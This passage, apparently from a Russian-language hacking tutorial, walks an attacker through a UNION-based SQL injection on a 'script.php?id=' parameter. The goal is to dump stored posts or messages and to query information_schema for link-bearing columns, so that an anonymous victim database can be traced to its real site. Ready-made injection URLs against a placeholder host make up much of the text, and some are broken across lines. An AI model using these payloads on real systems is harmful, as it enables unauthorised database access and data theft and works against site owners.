1. Сперва попытаемся извлечь контент
сайта, сохраненный в базе, и попробуем однозначно
идентифицировать его через поисковики (яндекс или гугл).
Контентом может являться что угодно — новость, пост на форуме,
запись в блоге и т.п. Для этого мы просто ищем таблицы, схожие
по смыслу, например, messages, posts, news, articles, comments и
извлекаем из них контент. К примеру, делаем запрос
site.com/script.php?id=-1+union+select+1,message,3+fr
om+messages--+
http://www.google.com/search?q="контент
из базы"
2. Если сайт не проиндексирован гуглом, ищем ссылки в самой
базе. Для этого используем следующий like-запрос.
http://site.com/script.php?id=-1+union+select+1,group_
concat(concat_ws(0x3A,table_schema,table_name,column_ name)),3+from+information_schema.columns+where+column_
name+like+'%http://%'--+
или
http://site.com/script.php?id=-1+union+select+1,group_concat(concat_ws(0x3A,table_
schema,table_name,column_name)),3+from+information_
schema.columns+where+column_name+like+'%.php%'--+
и из полученных результатов выбираем локальные ссылки
(наверняка, они будут).
